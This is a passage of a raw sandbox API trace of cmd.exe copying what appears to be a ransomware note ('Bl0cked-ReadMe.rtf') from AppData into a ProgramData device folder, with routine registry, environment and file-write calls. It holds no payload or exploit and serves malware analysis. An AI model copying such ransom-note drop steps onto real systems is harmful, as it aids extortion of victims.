[0147.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.352] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.353] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.353] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.353] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.353] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.353] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.353] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.353] GetEnvironmentStringsW () returned 0x3401c8* [0147.353] FreeEnvironmentStringsW (penv=0x3401c8) returned 1 [0147.354] GetEnvironmentStringsW () returned 0x3401c8* [0147.354] FreeEnvironmentStringsW (penv=0x3401c8) returned 1 [0147.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebb4 | out: phkResult=0x14ebb4*=0x40) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegCloseKey (hKey=0x40) returned 0x0 [0147.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebb4 | out: phkResult=0x14ebb4*=0x40) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegCloseKey (hKey=0x40) returned 0x0 [0147.354] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886375 [0147.354] srand (_Seed=0x5b886375) [0147.354] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" [0147.354] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" [0147.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.355] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.355] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.355] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.355] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.355] GetEnvironmentStringsW () returned 0x342318* [0147.355] FreeEnvironmentStringsW (penv=0x342318) returned 1 [0147.355] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.355] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.355] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.355] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.355] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.355] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.356] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.356] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.356] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.356] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f980, lpFilePart=0x14f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f97c*="Desktop") returned 0x18 [0147.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.356] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.356] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.357] GetEnvironmentStringsW () returned 0x342b38* [0147.357] FreeEnvironmentStringsW (penv=0x342b38) returned 1 [0147.357] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.357] GetConsoleOutputCP () returned 0x1b5 [0147.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.357] GetUserDefaultLCID () returned 0x409 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fac0, cchData=128 | out: lpLCData="0") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fac0, cchData=128 | out: lpLCData="0") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fac0, cchData=128 | out: lpLCData="1") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.358] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.359] GetConsoleTitleW (in: lpConsoleTitle=0x330908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.359] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.359] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.359] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.360] _wcsicmp (_String1="type", _String2=")") returned 75 [0147.360] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0147.360] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0147.360] _wcsicmp (_String1="IF", _String2="type") returned -11 [0147.360] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0147.360] _wcsicmp (_String1="REM", _String2="type") returned -2 [0147.360] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] GetFileType (hFile=0x7) returned 0x2 [0147.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0147.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f9b8 | out: lpMode=0x14f9b8) returned 1 [0147.409] _dup (_FileHandle=1) returned 3 [0147.409] _close (_FileHandle=1) returned 0 [0147.409] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0147.409] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f988, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0147.411] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0147.411] GetConsoleTitleW (in: lpConsoleTitle=0x14f7b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.411] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0147.411] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0147.411] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0147.411] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0147.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f31c) returned 0x330ec0 [0147.413] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0147.413] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0147.413] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0147.413] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e228, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0147.413] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] GetFileType (hFile=0x54) returned 0x1 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e280 | out: lpFileSizeHigh=0x14e280*=0x0) returned 0x1632 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.419] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.419] GetFileType (hFile=0x4c) returned 0x1 [0147.419] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.419] GetFileType (hFile=0x4c) returned 0x1 [0147.419] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.419] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.422] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.422] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.423] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.423] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] 